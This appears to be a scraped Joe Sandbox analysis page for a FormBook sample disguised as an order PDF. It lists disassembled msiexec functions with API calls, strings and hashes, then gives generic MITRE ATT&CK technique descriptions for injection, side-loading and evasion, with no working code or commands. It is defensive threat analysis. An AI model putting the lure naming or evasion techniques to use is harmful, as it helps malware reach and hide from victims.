Function 003F915B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?), ref: 003F91E4
GetProcAddress.KERNEL32(?,?), ref: 003F924F

Strings

$, xrefs: 003F9219

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: $
API String ID: 2574300362-3993045852
Opcode ID: 301e1f5d71252b83a9065db292e5e846ea8836258d19956d5da4fab7eeaf32a9
Instruction ID: f0d4c1f344a680e6cd872c59099141861e3e1be7454928d51143c7dc06187597
Opcode Fuzzy Hash: 301e1f5d71252b83a9065db292e5e846ea8836258d19956d5da4fab7eeaf32a9
Instruction Fuzzy Hash: 85317C31A0021DFFCB06CFA9C844BBEBBB9EF48354F14846AE904EB251DB309901CB90

Function 003F3C24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(003FC838,?,?,?,003F3C1E,00000000,00000000), ref: 003F3C31
SetServiceStatus.ADVAPI32(003FC850,?,?,?,003F3C1E,00000000,00000000), ref: 003F3CC0
GetLastError.KERNEL32(?,?,?,003F3C1E,00000000,00000000), ref: 003F3CCC
LeaveCriticalSection.KERNEL32(003FC838,?,?,?,003F3C1E,00000000,00000000), ref: 003F3CDF

Strings

SetServiceStatus failed., xrefs: 003F3CD4

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveServiceStatus
String ID: SetServiceStatus failed.
API String ID: 427148986-1344523210
Opcode ID: b2083d0ee184eac23beef620196bb59c2b6b8c18983a0a321a1f77073b0533c6
Instruction ID: a4d76aea06191d5800dba1f1f6084921114ea5a9878802bef3496419f6a3dcae
Opcode Fuzzy Hash: b2083d0ee184eac23beef620196bb59c2b6b8c18983a0a321a1f77073b0533c6
Instruction Fuzzy Hash: 5D1191729A025DDBC7139F29EE4873977EDE7447A1F01502AEA05A3231C7B18D49CB90

Function 003F8ADC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35librarysleeploaderCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A,?,003F8B8F,?,?), ref: 003F8AE8
LoadLibraryW.KERNEL32(COMCTL32,003F8B8F,?,?), ref: 003F8B10
GetProcAddress.KERNEL32(?,InitCommonControlsEx), ref: 003F8B2E

Strings

InitCommonControlsEx, xrefs: 003F8B28
COMCTL32, xrefs: 003F8B0B

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: COMCTL32$InitCommonControlsEx
API String ID: 188063004-472741233
Opcode ID: ca04a706f7b8684eaede3a7e3a23cca3c4f0d510e871786e5b5f77f5a97f5b24
Instruction ID: cbdc80b0235cc8a148685233f46c44a992efe3545fba33dfedd4135313952c2b
Opcode Fuzzy Hash: ca04a706f7b8684eaede3a7e3a23cca3c4f0d510e871786e5b5f77f5a97f5b24
Instruction Fuzzy Hash: DDF0127169028FDBD7179B25AD1CB367AADBBA5345F151436E600C6260EF74CC05CB50

Function 003F9A60 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 003F9B4E
?terminate@@YAXXZ.MSVCRT ref: 003F9BF7

Strings

csm, xrefs: 003F9BCA
csm, xrefs: 003F9B38

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: ?terminate@@CurrentImageNonwritable
String ID: csm$csm
API String ID: 3343398186-3733052814
Opcode ID: f6ccc3457aa1d1c79f538334962eb63ce0edb61bfc64b48bfe0129695930f4a1
Instruction ID: 3ac897d207d2e45741183051b7aea0294336bd29442d2edc6594332298a7b66a
Opcode Fuzzy Hash: f6ccc3457aa1d1c79f538334962eb63ce0edb61bfc64b48bfe0129695930f4a1
Instruction Fuzzy Hash: C451C034A0020C9BCF12DF68D884BBEBBB9EF44324F158056EA159B392D771DD51CB91

Function 003F612F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

IsCharAlphaNumericW.USER32(?,00000000,00000104,00000000,?,?,?,?,?,003F6B65,?,?,?), ref: 003F614F

Strings

Property value is too long., xrefs: 003F6264
ek?, xrefs: 003F623E
", xrefs: 003F619A

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AlphaCharNumeric
String ID: "$Property value is too long.$ek?
API String ID: 1535711457-1568716125
Opcode ID: 19ecf40e6258a9baa1339ef9191a144db3804cf0b82615ba84fe09ddf5b158ba
Instruction ID: d918a55922f91a8ecabc3345d899f246b008b8cc7f86e67d2e222a7438cbec4a
Opcode Fuzzy Hash: 19ecf40e6258a9baa1339ef9191a144db3804cf0b82615ba84fe09ddf5b158ba
Instruction Fuzzy Hash: 2D41E775E00139ABCB35EF69C45257AB3F1EFA8710B658825EAC5E7284F7348D42D350

Function 003F3CF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Msi.dll), ref: 003F3D10
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003F3D29

Strings

DllGetClassObject, xrefs: 003F3D23
Msi.dll, xrefs: 003F3D0B

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: DllGetClassObject$Msi.dll
API String ID: 2574300362-3279299384
Opcode ID: 5ae208884dbe44e7e7d41cd7fa1a85bf8d6a0dd788cad0769a8c4d34f50d0240
Instruction ID: 545998da49f3d99414cc474575f3245e20de6665b54d22ad1e502acc8ea3398e
Opcode Fuzzy Hash: 5ae208884dbe44e7e7d41cd7fa1a85bf8d6a0dd788cad0769a8c4d34f50d0240
Instruction Fuzzy Hash: 33314C35A50218EFCB06DB69DD58DBEB7ADFF48710B010499F906E32A0DA70EE01CB90

Function 003F5F66 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 003F5FF6
memcpy.MSVCRT ref: 003F6055
memcpy.MSVCRT ref: 003F60C6

Strings

`, xrefs: 003F5F9E

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: memcpy
String ID: `
API String ID: 3510742995-2679148245
Opcode ID: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
Instruction ID: 49287c4b2a8acbee653c453d76823cf87cbf0fc2fd59fcb24b9837f268f1d23d
Opcode Fuzzy Hash: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
Instruction Fuzzy Hash: E951CE72A0022AEFCB15DFACC8865BEB7B5FF58310B264555DA14DB381EB71AE40C790

Function 003F4970 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 130stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,003F13CC,?,mewuifsoarpcvxgh!), ref: 003F4A83
lstrcmpW.KERNEL32(?,003F13D0,?,mewuifsoarpcvxgh!), ref: 003F4A93
lstrcmpW.KERNEL32(?,003F13D8,?,mewuifsoarpcvxgh!), ref: 003F4AA3

Strings

mewuifsoarpcvxgh!, xrefs: 003F49A0

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: lstrcmp
String ID: mewuifsoarpcvxgh!
API String ID: 1534048567-2729521250
Opcode ID: d5ef0bb57442258f552bc54d903c296cd8297ed90bea9baed2af3e720ccbf501
Instruction ID: b31f50c2ab8028e213feec8891d669193566ad58cd872dd6f2703884bdb1033f
Opcode Fuzzy Hash: d5ef0bb57442258f552bc54d903c296cd8297ed90bea9baed2af3e720ccbf501
Instruction Fuzzy Hash: A441C336B9021DEADF239B65E880ABFB3B5EF44710F15402AEA01E7290E7748D81C754

Function 003F44A9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,003FA2B0,000000A8,003F6E7E,00000000,00000000,?), ref: 003F44E0
GlobalFree.KERNEL32(?), ref: 003F450F
GlobalFree.KERNEL32(?), ref: 003F4590

Strings

%d.%d.%.4d.%d, xrefs: 003F45E9

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: Global$Free$Alloc
String ID: %d.%d.%.4d.%d
API String ID: 1780285237-3399825337
Opcode ID: 32cbda90e284061f3342ef998bcf5a2e6e4a762c3dde156b8d2864436ab8633b
Instruction ID: 3459a5452be0d35d9b0dfee7cf584e026e05b1217be0315416dd74f1212028f0
Opcode Fuzzy Hash: 32cbda90e284061f3342ef998bcf5a2e6e4a762c3dde156b8d2864436ab8633b
Instruction Fuzzy Hash: FA415B71D0022C9FDB22DB65CD45BBEBBB9EF44310F2145A9E609A7291DB309E84CF50

Function 003F9280 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 003F9C98: GetModuleHandleW.KERNEL32(00000000), ref: 003F9C9F

__set_app_type.MSVCRT ref: 003F9292
__p__fmode.MSVCRT ref: 003F92A8
__p__commode.MSVCRT ref: 003F92B6
__setusermatherr.MSVCRT ref: 003F92D7

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 1b83822ea008d37191c39d96aed4be7ba4ae255058e04d92408f102b21269d36
Instruction ID: 9e4b5b664ac5dfd0ac7f7c7eec25a4ff9d8931aff25aae4ffc6ad1296471a07c
Opcode Fuzzy Hash: 1b83822ea008d37191c39d96aed4be7ba4ae255058e04d92408f102b21269d36
Instruction Fuzzy Hash: B3F0F87019430DDFC35BAB31AD1E7383B6ABB05321F11161AE5628A2E0CF398045CF10

Function 003F3F4C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

StgOpenStorage.OLE32(?,00000000,00000020,00000000,00000000,?), ref: 003F3F75

Strings

&, xrefs: 003F4169

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: OpenStorage
String ID: &
API String ID: 222319337-1010288
Opcode ID: 9dd3cea2a16f8d14cc5e1623de9458b863ebc009704ec019cbaf0d2ee0c6dacc
Instruction ID: 57862c30348cdd3ad22561e0160d7764fb5e62180a998af86882148b26d7fe95
Opcode Fuzzy Hash: 9dd3cea2a16f8d14cc5e1623de9458b863ebc009704ec019cbaf0d2ee0c6dacc
Instruction Fuzzy Hash: 18912870A10218AFDB19DFA4DD99EBEB7BDFF14315B044528F616E7290EB20AD44CB50

Function 003F88B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 003F88D6
GetProcAddress.KERNEL32(?), ref: 003F891F

Strings

OLE32, xrefs: 003F88FB

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AddressProcSleep
String ID: OLE32
API String ID: 1175476452-2276369563
Opcode ID: 54016846d4bf862933123c0dfc6ebb44b839a9dd028f2709d6dc20b896b85bcd
Instruction ID: d05a281767a9252000b8b974ff6f2d003c3637b3ab34a0bd9fcd50c6407f7a5c
Opcode Fuzzy Hash: 54016846d4bf862933123c0dfc6ebb44b839a9dd028f2709d6dc20b896b85bcd
Instruction Fuzzy Hash: DE01243265429AABDB1BDB359E1A73B3AEDEB81314F05003DE641C7250EFA0CC01C761

Function 003F8D4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 003F8D70
GetProcAddress.KERNEL32(?), ref: 003F8DB9

Strings

KERNEL32, xrefs: 003F8D95

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AddressProcSleep
String ID: KERNEL32
API String ID: 1175476452-1217789123
Opcode ID: 93acb3f0b99a4c90ab8bdba53294eec34958725dcf0c6e0fe14da7ed71e71f18
Instruction ID: 983efaf47d23dd114ec6d1f4b5a07524818f109b8c412646b64f752cfd4052fd
Opcode Fuzzy Hash: 93acb3f0b99a4c90ab8bdba53294eec34958725dcf0c6e0fe14da7ed71e71f18
Instruction Fuzzy Hash: 9E01B1316542599BDB2B9B399E1977A3A9DEF92314F09043EFA45C7390DF60DC01C790

Function 003F2F5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,HZ?,?,003F5A48,?,?,?), ref: 003F2F8B

Strings

Software\Policies\Microsoft\Windows\Installer, xrefs: 003F2F85
HZ?, xrefs: 003F2F7F

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: Open
String ID: HZ?$Software\Policies\Microsoft\Windows\Installer
API String ID: 71445658-4226536645
Opcode ID: 07d0f087fd404f21ecc3e120bb09149cd57c8b38e8f8f26772e1e138c0440306
Instruction ID: 6afef55f2788e0f9225a14819e0189fd3fc98e6df46ef45c68a83643d128acaa
Opcode Fuzzy Hash: 07d0f087fd404f21ecc3e120bb09149cd57c8b38e8f8f26772e1e138c0440306
Instruction Fuzzy Hash: E9D0527196478CAEFB238754AD0AF73BAADC380329F080058BA0C525A6CA649C60C350

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ31072024_August order_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EqtGqZpPskFq.exe.log

